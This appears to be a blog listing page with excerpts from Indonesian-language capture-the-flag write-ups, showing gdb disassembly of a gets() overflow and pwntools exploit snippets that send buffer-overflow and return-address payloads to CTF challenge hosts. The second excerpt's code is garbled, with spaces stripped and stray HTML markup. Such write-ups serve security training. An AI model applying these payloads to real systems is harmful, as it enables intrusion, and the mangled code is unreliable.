TAMUCTF 2018 - Pwning

Pwn1 Diberikan sebuah file binary dengan informasi sebagai berikut Percobaan debugging menggunakan gdb $ gdb -q pwn1 Reading symbols from pwn1…(no debugging symbols found)…done. gdb-peda $ pdisass main Berikut hasil disassable fungsi main 0x080485cf <+29>: call 0x8048410 <setvbuf@plt> 0x080485d4 <+34>: add esp,0x10 0x080485d7 <+37>: sub esp,0xc 0x080485da <+40>: push 0x8048700 0x080485df <+45>: call 0x80483f0 <puts@plt> 0x080485e4 <+50>: add esp,0x10 0x080485e7 <+53>: sub esp,0xc 0x080485ea <+56>: push 0x8048720 0x080485ef <+61>: call 0x80483f0 <puts@plt> 0x080485f4 <+66>: add esp,0x10 0x080485f7 <+69>: sub esp,0xc 0x080485fa <+72>: push 0x804875f 0x080485ff <+77>: call 0x80483f0 <puts@plt> 0x08048604 <+82>: add esp,0x10 0x08048607 <+85>: mov DWORD PTR [ebp-0xc],0x0 0x0804860e <+92>: sub esp,0xc 0x08048611 <+95>: lea eax,[ebp-0x23] 0x08048614 <+98>: push eax 0x08048615 <+99>: call 0x80483d0 <gets@plt> 0x0804861a <+104>: add esp,0x10 0x0804861d <+107>: cmp DWORD PTR [ebp-0xc],0xf007ba11 0x08048624 <+114>: jne 0x804862d <main+123> 0x08048626 <+116>: call 0x804854b <print_flag> 0x0804862b <+121>: jmp 0x804863d <main+139> 0x0804862d <+123>: sub esp,0xc 0x08048630 <+126>: push 0x8048772 0x08048635 <+131>: call 0x80483f0 <puts@plt> 0x0804863a <+136>: add esp,0x10 0x0804863d <+139>: mov eax,0x0 0x08048642 <+144>: mov ecx,DWORD PTR [ebp-0x4] 0x08048645 <+147>: leave 0x08048646 <+148>: lea esp,[ecx-0x4] 0x08048649 <+151>: ret Terlihat terdapat penggunaan fungsi gets() yang vulnerable buffer overflow.
Read more →

TUCTF 2017 - Write up

gdb.execute("b 0x0000000000401c82")whileTrue:forcinchar_set:pattern=flag+c+"A"(55-len(flag))gdb.execute("r {}“.format(pattern))foriinrange(len(flag)):gdb.execute("c")rax=gdb.execute("p/x $rax",True,True).split()[-1]ifrax=="0x0":flag+=cif”}“inflag:print("Flag : %s"%(flag))exit(0)print("Curret Flag : %s"%(flag))sleep(1)breakprint("Pattern : %s"%(pattern))print("Nilai Rax : %s"%(rax))vuln=remote("vulnchat.tuCTF.com",4141)payload="A"20+p32(0x00007325)# overwrite with “%s"vuln.sendlineafter("Enter your username: “,payload)payload2="A"49+p32(0x804856b)vuln.sendlineafter(”: “,payload2)printvuln.recvall()flag="\x72"vuln2=remote("vulnchat2.tuCTF.com",4242)vuln2.sendlineafter("Enter your username: “,"AAAA")vuln2.recvuntil("AAAA: “)payload="A"*43+flagvuln2.send(payload)printvuln2.recv(1024)never=remote("neverending.tuCTF.com",12345)char_set="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 !"#$%&'()*+,-./:;<=>?@[]^_`{|}~</span>s"defround1(char="A"):never.sendlineafter("text:“,char)enc_base=never.recvline().split("is “)[1]enc_msg=never.recvline().split("is “)[1]enc_msg=enc_msg.split(” decrypted?\n")[0]log.info("ENC BASE : -> {}“.format(enc_base))log.info("ENC MSG : -> {}“.format(enc_msg))cal=ord(char)-ord(enc_base[0])dec="“.join([chr(ord(b)+cal)forbinenc_msg])<span class="n">non_printable</span> <span class="o">=</span> <span class="p">[</span> <span class="nb">chr</span><span class="p">(</span><span class="nb">ord</span><span class="p">(</span><span class="n">z</span><span class="p">))</span> <span class="k">for</span> <span class="n">z</span> <span class="ow">in</span> <span class="n">dec</span> <span class="k">if</span> <span class="n">z</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">char_set</span><span class="p">]</span> <span class="n">printable</span> <span class="o">=</span> <span class="s">""</span><span class="o">.
Read more →

TUCTF 2017 - Writeup

Reversing 200 (Unknown) Diberikan file ELF 64 bit stripped. Berikut hasil disassembly fungsi main signed __int64 __fastcall main(int a1, char **a2, char **a3) { signed __int64 result; // rax@2 unsigned int i; // [sp+14h] [bp-Ch]@5 char *v5; // [sp+18h] [bp-8h]@5 if ( a1 == 2 ) { if ( strlen(a2[1]) == 56 ) { v5 = a2[1]; for ( i = 0; i < 0x38; ++i ) { if ( (unsigned int)sub_401E90((__int64)v5, i) ) dword_603084 = 1; } if ( dword_603084 ) puts("Nope.
Read more →

Write Up Cyber Jawara 2017

Read more →